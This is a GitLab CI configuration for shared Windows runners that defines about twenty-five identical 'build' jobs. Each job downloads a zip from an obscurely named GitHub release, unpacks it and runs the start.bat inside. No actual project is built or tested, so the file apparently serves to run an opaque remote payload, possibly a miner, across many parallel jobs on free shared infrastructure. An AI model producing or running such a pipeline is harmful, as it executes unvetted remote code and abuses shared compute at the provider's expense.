.shared_windows_runners:
  tags:
    - shared-windows
    - windows
    - windows-1809

stages:
  - build
  - test
  - run

build_1:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
    
build_2:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
    
build_3:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat

build_4:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_5:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_6:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_7:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_8:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_9:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_10:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_11:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_l2:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_13:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_14:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_15:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_16:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_17:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_18:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_19:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_20:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_21:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_22:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_23:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_24:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  
build_25:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://github.com/muhanyawatigabelas/muhanyawatigabelas/releases/download/muhanyawa/muhanyawa.zip -OutFile start.zip
    - Expand-Archive start.zip
    - .\start\start.bat
  